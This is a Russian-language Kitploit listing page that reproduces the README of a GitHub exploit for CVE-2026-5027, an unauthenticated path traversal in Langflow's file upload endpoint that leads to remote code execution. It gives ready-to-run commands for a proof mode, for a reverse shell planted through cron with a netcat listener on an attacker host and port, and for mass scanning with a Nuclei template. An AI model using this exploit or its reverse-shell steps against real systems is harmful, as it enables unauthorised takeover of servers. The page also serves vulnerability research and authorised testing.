Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-5027
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 CVE-2026-5027 - Langflow Path Traversal

Уязвимость кибербезопасности_ эксплуатация обхода пути

Произвольная запись файла для RCE
Неаутентифицированное удаленное выполнение кода через загрузку файла

CVE CVSS Exploit

📌 Обзор

Langflow страдает от критической уязвимости обхода пути в конечной точке загрузки файлов (POST /api/v2/files).

Атакующий может отправить вредоносное имя файла, содержащее последовательности ../, чтобы записать произвольные файлы в любом месте файловой системы сервера.

Это легко приводит к полному удаленному выполнению кода (RCE) — например, путем размещения веб-шелла или внедрения в crontab.


🛠️ Возможности

  • ✅ Неаутентифицированная эксплуатация (настройки автоматического входа по умолчанию)
  • ✅ Простой Proof-of-Concept (записывает тестовый файл в /tmp)
  • ✅ Полный обратный shell через cron (Linux)
  • ✅ Включен шаблон Nuclei для массового сканирования
  • ✅ Легко настраиваемая глубина обхода

🚀 Быстрый старт

1. Proof of Concept (Безопасный тест)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Ожидаемый вывод при уязвимости:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Полный обратный shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Содержимое репозитория

ФайлОписание
CVE-2026-5027.pyОсновной эксплойт на Python (PoC + RCE)
CVE-2026-5027.yamlШаблон Nuclei для сканирования
README.mdЭтот файл

🎯 Примеры использования

cve-2026-5027

Режим Proof

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Режим Reverse Shell

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных и авторизованных целей тестирования безопасности.

Используйте ответственно и только на системах, на которые у вас есть явное разрешение на тестирование.


Сделано с ❤️ для сообщества red team

Скачать инструмент